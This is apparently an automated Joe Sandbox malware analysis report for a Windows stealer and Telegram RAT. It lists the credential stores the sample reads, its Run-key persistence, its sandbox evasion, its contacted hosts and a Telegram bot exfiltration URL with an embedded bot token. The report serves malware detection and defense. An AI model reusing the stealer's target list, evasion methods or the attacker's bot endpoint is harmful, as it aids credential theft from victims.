Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EF6D0 GetUserNameW, 15_2_018EF6D0

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
Source: Yara match | File source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
Source: Yara match | File source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
MITRE ATT&CK Matrix (grouped by tactic; bracketed numbers are the report's per-technique counts, shown only for techniques the report flagged)

Initial Access
• Valid Accounts
• Default Accounts
• Domain Accounts
• Local Accounts
• Cloud Accounts
• Replication Through Removable Media
• External Remote Services
• Drive-by Compromise
• Exploit Public-Facing Application
• Supply Chain Compromise

Execution
• Windows Management Instrumentation [211]
• PowerShell [1]
• At (Linux)
• At (Windows)
• Cron
• Launchd
• Scheduled Task
• Command and Scripting Interpreter
• PowerShell
• AppleScript

Persistence
• Registry Run Keys / Startup Folder [11]
• Boot or Logon Initialization Scripts
• Logon Script (Windows)
• Logon Script (Mac)
• Network Logon Script
• Rc.common
• Startup Items
• Scheduled Task/Job
• At (Linux)
• At (Windows)

Privilege Escalation
• Process Injection [112]
• Registry Run Keys / Startup Folder [11]
• Logon Script (Windows)
• Logon Script (Mac)
• Network Logon Script
• Rc.common
• Startup Items
• Scheduled Task/Job
• At (Linux)
• At (Windows)

Defense Evasion
• Disable or Modify Tools [1]
• Deobfuscate/Decode Files or Information [1]
• Obfuscated Files or Information [1]
• Masquerading [1]
• Virtualization/Sandbox Evasion [131]
• Process Injection [112]
• Hidden Files and Directories [1]
• Indicator Removal from Tools
• Masquerading
• Invalid Code Signature

Credential Access
• OS Credential Dumping [1]
• Input Capture [21]
• Credentials in Registry [1]
• NTDS
• LSA Secrets
• Cached Domain Credentials
• DCSync
• Proc Filesystem
• /etc/passwd and /etc/shadow
• Network Sniffing

Discovery
• Account Discovery [1]
• File and Directory Discovery [1]
• System Information Discovery [114]
• Security Software Discovery [211]
• Process Discovery [2]
• Virtualization/Sandbox Evasion [131]
• Application Window Discovery [1]
• System Owner/User Discovery [1]
• Remote System Discovery [1]
• System Network Configuration Discovery [1]

Lateral Movement
• Remote Services
• Remote Desktop Protocol
• SMB/Windows Admin Shares
• Distributed Component Object Model
• SSH
• VNC
• Windows Remote Management
• Shared Webroot
• Software Deployment Tools
• Taint Shared Content

Collection
• Archive Collected Data [1]
• Data from Local System [1]
• Email Collection [1]
• Input Capture [21]
• Clipboard Data [1]
• GUI Input Capture
• Web Portal Capture
• Credential API Hooking
• Data Staged
• Local Data Staging

Exfiltration
• Exfiltration Over Other Network Medium
• Exfiltration Over Bluetooth
• Automated Exfiltration
• Scheduled Transfer
• Data Transfer Size Limits
• Exfiltration Over C2 Channel
• Exfiltration Over Alternative Protocol
• Exfiltration Over Symmetric Encrypted Non-C2 Protocol
• Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
• Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Command and Control
• Web Service [1]
• Ingress Tool Transfer [1]
• Encrypted Channel [11]
• Non-Application Layer Protocol [3]
• Application Layer Protocol [14]
• Multiband Communication
• Commonly Used Port
• Application Layer Protocol
• Web Protocols
• File Transfer Protocols

Network Effects
• Eavesdrop on Insecure Network Communication
• Exploit SS7 to Redirect Phone Calls/SMS
• Exploit SS7 to Track Device Location
• SIM Card Swap
• Manipulate Device Communication
• Jamming or Denial of Service
• Rogue Wi-Fi Access Points
• Downgrade to Insecure Protocols
• Rogue Cellular Base Station

Remote Service Effects
• Remotely Track Device Without Authorization
• Remotely Wipe Data Without Authorization
• Obtain Device Cloud Backups
• Carrier Billing Fraud
• Manipulate App Store Rankings or Ratings
• Abuse Accessibility Features
• Generate Fraudulent Advertising Revenue

Impact
• Modify System Partition
• Device Lockout
• Delete Device Data
• Data Encrypted for Impact
• Data Destruction
• Data Encrypted for Impact
Behavior Graph (ID: 830846; Sample: izwFjkhFJm.exe; Startdate: 20/03/2023; Architecture: WINDOWS; Score: 100)

Contacted hosts: api4.ipify.org, api.telegram.org, api.ipify.org
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Yara detected Telegram RAT; 5 other signatures
Processes started from the sample: izwFjkhFJm.exe, Oefdyik.exe, kDPmkTm.exe, 2 other processes

izwFjkhFJm.exe
• Dropped: C:\Users\user\AppData\Roaming\...\Oefdyik.exe (PE32); C:\Users\user\...\Oefdyik.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\izwFjkhFJm.exe.log (ASCII)
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 3 other signatures
• Started: izwFjkhFJm.exe (child, see below), powershell.exe, izwFjkhFJm.exe, 2 other processes

Oefdyik.exe
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Encrypted powershell cmdline option found
• Started: Oefdyik.exe (child, see below), powershell.exe, Oefdyik.exe

kDPmkTm.exe
• Started: powershell.exe

2 other processes
• Started: powershell.exe

Child izwFjkhFJm.exe
• Network: api4.ipify.org 173.231.16.76, port 443, local ports 49699 and 49702 (WEBNXUS, United States); api.telegram.org 149.154.167.220, port 443, local ports 49701 and 49715 (TELEGRAMRU, United Kingdom); api.ipify.org
• Dropped: C:\Users\user\AppData\Roaming\...\kDPmkTm.exe (PE32); C:\Users\user\...\kDPmkTm.exe:Zone.Identifier (ASCII)
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys

Child Oefdyik.exe
• Network: api.ipify.org
• Signatures: Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook

Each powershell.exe instance started conhost.exe.

Source | Detection | Scanner | Label
izwFjkhFJm.exe | 33% | ReversingLabs | ByteCode-MSIL.Packed.Generic
izwFjkhFJm.exe | 53% | Virustotal |
izwFjkhFJm.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | 53% | Virustotal |
C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | 33% | ReversingLabs | ByteCode-MSIL.Packed.Generic
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 33% | ReversingLabs | ByteCode-MSIL.Packed.Generic

Source | Detection | Scanner | Label
27.2.Oefdyik.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1215472

No Antivirus matches

Source | Detection | Scanner | Label
https://api.telegram.org4 | 0% | URL Reputation | safe
https://urn.to/r/sds_see | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api4.ipify.org | 173.231.16.76 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
api.ipify.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | Sources: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://api.telegram.org4 | Sources: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
https://api.telegram.org | Sources: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.newtonsoft.com/jsonschema | Sources: kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.newtonsoft.com/json | Sources: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | Sources: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/ | Sources: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://urn.to/r/sds_see | Sources: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
http://api.telegram.org | Sources: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Sources: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://james.newtonking.com/projects/json | Sources: Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
173.231.16.76 | api4.ipify.org | United States | 18450 | WEBNXUS | false
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830846
Start date and time: 2023-03-20 18:29:52 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: izwFjkhFJm.exe
Original Sample Name: ae2a3b41292c66a9dd6f10c874c05293.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@29/16@8/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 45
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.126.32.137, 20.190.160.13, 40.126.32.69, 40.126.32.132, 20.190.160.15, 20.190.160.23, 40.126.32.67, 20.190.160.21, 13.89.179.12
• Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.tm.v6.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Time | Type | Description
18:30:59 | API Interceptor | 90x Sleep call for process: powershell.exe modified
18:31:25 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
18:31:31 | API Interceptor | 590x Sleep call for process: izwFjkhFJm.exe modified
18:31:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
18:31:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
18:31:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
18:32:48 | API Interceptor | 17x Sleep call for process: Oefdyik.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                          Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                            https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                    New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                      PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                        PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                          PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                            FixDefError.exeGet hashmaliciousXmrigBrowse
                                                              doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                  NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                      iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                        Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                          YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                            Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                173.231.16.76DttL6H1DqQ.exeGet hashmaliciousBabuk, Chaos, ContiBrowse
                                                                                • api.ipify.org/
                                                                                one.docGet hashmaliciousCryptOne, HancitorBrowse
                                                                                • api.ipify.org/
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api4.ipify.orgSmh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 104.237.62.211
                                                                                eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                • 104.237.62.211
api.telegram.org | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | 149.154.167.220
api.telegram.org | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Remittance_slip.bat | malicious | Unknown | 149.154.167.220
api.telegram.org | New_Order_M2023SI3.xls | malicious | AgentTesla | 149.154.167.220
api.telegram.org | PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 149.154.167.220
api.telegram.org | PO_340166.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | PO_IN34023.exe | malicious | AgentTesla, zgRAT | 149.154.167.220
api.telegram.org | FixDefError.exe | malicious | Xmrig | 149.154.167.220
api.telegram.org | doc10010679052382012143717.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | EPe7VpI8DZ.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | NJA7TOaADm.exe | malicious | AgentTesla, zgRAT | 149.154.167.220
api.telegram.org | 2wJjtj30x6.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | iubK8Ka7o7.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Bank_Slip-_701536.doc | malicious | AgentTesla | 149.154.167.220
api.telegram.org | YWombrpvpG.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Bestellung_(PO4703392)_doc.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Parts.exe | malicious | AgentTesla | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | 149.154.167.220
TELEGRAMRU | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | Remittance_slip.bat | malicious | Unknown | 149.154.167.220
TELEGRAMRU | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
WEBNXUS | Smh3IA9098.exe | malicious | AgentTesla | 64.185.227.155
WEBNXUS | CsTapHIkAO.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
WEBNXUS | g0PWOnCNZH.exe | malicious | AgentTesla | 64.185.227.155
WEBNXUS | FeDex_shipping_document.exe | malicious | AgentTesla | 64.185.227.155
WEBNXUS | DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
WEBNXUS | New_Order_M2023SI3.xls | malicious | AgentTesla | 104.237.62.211
WEBNXUS | TT_copy.xls | malicious | AgentTesla | 173.231.16.76
WEBNXUS | PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 64.185.227.155
WEBNXUS | PO_340166.exe | malicious | AgentTesla | 64.185.227.155
WEBNXUS | 2303-64687.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | Product_specifications.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
WEBNXUS | eRPRiQhQEI.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | INV_SOA.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | IMG_6071220733pdf.exe | malicious | AgentTesla | 104.237.62.211
WEBNXUS | yeni_sipari#U015f.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | yeni_sipari#U015f.exe | malicious | AgentTesla | 173.231.16.76
WEBNXUS | DHL_AWB_copy_&_draft_COO.exe | malicious | AgentTesla | 64.185.227.155
WEBNXUS | FixDefError.exe | malicious | Xmrig | 104.237.62.211
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | CsTapHIkAO.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Payment Invoice file.htm | malicious | HTMLPhisher | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Budget plan 2023.zip | malicious | Unknown | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | setup.exe | malicious | Xmrig | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Remittance_slip.bat | malicious | Unknown | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Payment Invoice 0012657.html | malicious | HTMLPhisher | 149.154.167.220, 173.231.16.76
